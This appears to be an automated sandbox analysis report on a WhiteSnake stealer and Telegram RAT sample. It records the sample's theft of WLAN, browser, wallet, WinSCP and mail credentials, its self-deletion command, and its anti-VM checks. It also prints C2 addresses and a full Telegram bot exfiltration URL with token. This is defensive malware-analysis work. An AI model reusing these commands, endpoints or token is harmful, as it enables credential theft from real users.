          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597218Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597109Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 597000Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596890Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596781Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596672Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596562Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596453Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596344Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596234Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596125Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 596012Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 595906Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 595797Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 595687Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeThread delayed: delay time: 595566Jump to behavior
          Source: BA9qyj2c9G.exeBinary or memory string: qemu'
          Source: BA9qyj2c9G.exe, 00000000.00000002.2021425648.000001186D62D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          .NET source code references suspicious native API functions
          Source: BA9qyj2c9G.exe, c2Tj.csReference to suspicious API methods: NativeMethods.OpenProcess(processAccessMask, bInheritHandle: false, process.Id)
          Source: BA9qyj2c9G.exe, nturDQ.csReference to suspicious API methods: ReadProcessMemory(intPtr, lpBuffer.BaseAddress, array, array.Length, out var lpNumberOfBytesRead)
          Source: BA9qyj2c9G.exe, beLX.csReference to suspicious API methods: GetProcAddress(qcx, r00x)
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\BA9qyj2c9G.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeQueries volume information: C:\Users\user\Desktop\BA9qyj2c9G.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Uses netsh to modify the Windows network and firewall settings
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

          Stealing of Sensitive Information

          barindex
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: BA9qyj2c9G.exe PID: 7496, type: MEMORYSTR
          Yara detected WhiteSnake Stealer
          Source: Yara matchFile source: 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: BA9qyj2c9G.exe PID: 7496, type: MEMORYSTR
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %AppData%\Electrum\wallets
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: >%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %exodus.conf.json;exodus.wallet\*.seco
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $%AppData%\Jaxx\Local Storage\leveldb
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %AppData%\Exodus
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: &%LocalAppData%\Coinomi\Coinomi\wallets
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
          Tries to harvest and steal WLAN passwords
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: Process Memory Space: BA9qyj2c9G.exe PID: 7496, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: BA9qyj2c9G.exe PID: 7496, type: MEMORYSTR
          Yara detected WhiteSnake Stealer
          Source: Yara matchFile source: 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: BA9qyj2c9G.exe PID: 7496, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
          Windows Management Instrumentation          		1
          LSASS Driver          		1
          LSASS Driver          		11
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		2
          Obfuscated Files or Information          		1
          Credentials in Registry          		24
          System Information Discovery          		Remote Desktop Protocol2
          Data from Local System          		1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Access Token Manipulation          		1
          Timestomp          		Security Account Manager221
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		21
          Encrypted Channel          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
          Process Injection          		1
          DLL Side-Loading          		NTDS1
          Process Discovery          		Distributed Component Object ModelInput Capture1
          Non-Standard Port          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          File Deletion          		LSA Secrets151
          Virtualization/Sandbox Evasion          		SSHKeylogging2
          Non-Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Masquerading          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input Capture3
          Application Layer Protocol          		Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
          Virtualization/Sandbox Evasion          		DCSync1
          System Network Configuration Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Access Token Manipulation          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
          Process Injection          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570929 Sample: BA9qyj2c9G.exe Startdate: 08/12/2024 Architecture: WINDOWS Score: 100 40 api.telegram.org 2->40 42 ip-api.com 2->42 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Antivirus / Scanner detection for submitted sample 2->54 58 10 other signatures 2->58 8 BA9qyj2c9G.exe 14 6 2->8         started        signatures3 56 Uses the Telegram API (likely for C&C communication) 40->56 process4 dnsIp5 44 46.235.26.83, 49732, 8080 SURFPLANET-ASDE Germany 8->44 46 147.28.185.29, 49733, 80 RGNET-SEARGnetSeattleWestinEE United States 8->46 48 5 other IPs or domains 8->48 38 C:\Users\user\AppData\...\BA9qyj2c9G.exe.log, CSV 8->38 dropped 60 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 8->60 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->62 64 Tries to steal Mail credentials (via file / registry access) 8->64 66 5 other signatures 8->66 13 cmd.exe 1 8->13         started        16 cmd.exe 1 8->16         started        18 cmd.exe 1 8->18         started        file6 signatures7 process8 signatures9 68 Uses netsh to modify the Windows network and firewall settings 13->68 70 Tries to harvest and steal WLAN passwords 13->70 20 netsh.exe 2 13->20         started        22 conhost.exe 13->22         started        34 2 other processes 13->34 24 netsh.exe 2 16->24         started        26 conhost.exe 16->26         started        36 2 other processes 16->36 28 conhost.exe 18->28         started        30 timeout.exe 1 18->30         started        32 chcp.com 1 18->32         started        process10

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          BA9qyj2c9G.exe68%ReversingLabsByteCode-MSIL.Trojan.WhiteSnake
          BA9qyj2c9G.exe67%VirustotalBrowse
          BA9qyj2c9G.exe100%AviraHEUR/AGEN.1307453
          BA9qyj2c9G.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://209.38.221.184:80802a0%Avira URL Cloudsafe
          http://147.28.185.29:80/yrABY_user%40841618_report.wsr0%Avira URL Cloudsafe
          http://209.38.221.184:8080/yrABY_user%40841618_report.wsr0%Avira URL Cloudsafe
          http://46.235.26.83:8080/yrABY_user0%Avira URL Cloudsafe
          http://147.28.185.290%Avira URL Cloudsafe
          https://5.196.181.135:4430%Avira URL Cloudsafe
          http://51.159.4.500%Avira URL Cloudsafe
          http://206.166.251.4:8080/yrABY_user%40841618_report.wsr0%Avira URL Cloudsafe
          http://147.28.185.29/yrABY_user%40841618_report.wsr0%Avira URL Cloudsafe
          http://51.159.4.50:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%74%0%Avira URL Cloudsafe
          http://127.0.0.1:18772/handleOpenWSR?r=http://51.159.4.50:8080/get/3TJejBPXtn/yrABY_user0%Avira URL Cloudsafe
          http://147.28.185.29:80/yrABY_user0%Avira URL Cloudsafe
          http://51.159.4.50:80802a0%Avira URL Cloudsafe
          http://46.235.26.83:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%740%Avira URL Cloudsafe
          http://51.159.4.50:8080/yrABY_user0%Avira URL Cloudsafe
          http://46.235.26.83:8080/yrABY_user%40841618_report.wsr0%Avira URL Cloudsafe
          http://8.219.110.16:99990%Avira URL Cloudsafe
          http://51.159.4.502%VirustotalBrowse
          http://209.38.221.1840%Avira URL Cloudsafe
          http://209.38.221.184:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%0%Avira URL Cloudsafe
          http://206.166.251.4:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%70%Avira URL Cloudsafe
          http://206.166.251.40%Avira URL Cloudsafe
          http://209.38.221.184:8080/yrABY_user0%Avira URL Cloudsafe
          http://www.w3.or0%Avira URL Cloudsafe
          http://51.159.4.50:8080/3TJejBPXtn/yrABY_user0%Avira URL Cloudsafe
          http://51.159.4.50:8080/get/3TJejBPXtn/yrABY_user0%Avira URL Cloudsafe
          http://51.159.4.50:8080/yrABY_user%40841618_report.wsr0%Avira URL Cloudsafe
          http://51.159.4.50:8080/get0%Avira URL Cloudsafe
          http://46.235.26.83:80802a0%Avira URL Cloudsafe
          http://147.28.185.29:80/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%74%0%Avira URL Cloudsafe
          http://46.235.26.830%Avira URL Cloudsafe
          http://127.0.0.1:18772/handleOpenWSR?r=0%Avira URL Cloudsafe
          http://206.166.251.4:8080/yrABY_user0%Avira URL Cloudsafe
          http://206.166.251.4:80802a0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ip-api.com
          		208.95.112.1
          		truefalse
            		high
            api.telegram.org
            		149.154.167.220
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://ip-api.com/line?fields=query,countryfalse
                		high
                https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage?chat_id=-4568449403&text=%23CRYPTOMAINER%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E841618%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%5D%5D%7D&parse_mode=HTMLfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://209.38.221.184:80802aBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/chrome_newtabBA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFBA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://duckduckgo.com/ac/?q=BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://185.217.98.121:80BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://138.2.92.67:443BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://api.telegram.orgBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E95000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://api.telegram.org/botBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://crl.microsoftBA9qyj2c9G.exe, 00000000.00000002.2021425648.000001186D5A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://167.235.70.96:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://209.38.221.184:8080/yrABY_user%40841618_report.wsrBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://20.78.55.47:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://46.235.26.83:8080/yrABY_userBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://147.28.185.29BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessageBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://147.28.185.29:80/yrABY_user%40841618_report.wsrBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://51.159.4.50BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 2%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://107.161.20.142:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://5.196.181.135:443BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://206.166.251.4:8080/yrABY_user%40841618_report.wsrBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://101.43.160.136:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://147.28.185.29/yrABY_user%40841618_report.wsrBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://192.99.196.191:443BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://168.138.211.88:8099BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://18.228.80.130:80BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://51.159.4.50:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%74%BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallBA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011865182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://127.0.0.1:18772/handleOpenWSR?r=http://51.159.4.50:8080/get/3TJejBPXtn/yrABY_userBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://147.28.185.29:80/yrABY_userBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://51.159.4.50:80802aBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://ip-api.comBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854C40000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://46.235.26.83:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%74BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://51.159.4.50:8080/yrABY_userBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://185.217.98.121:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://46.235.26.83:8080/yrABY_user%40841618_report.wsrBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://8.219.110.16:9999BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://209.38.221.184BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://8.216.92.21:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://209.38.221.184:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854CBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://65.49.205.24:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://47.96.78.224:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://129.151.109.160:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoBA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://147.28.185.29:80BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://206.166.251.4:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%7BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
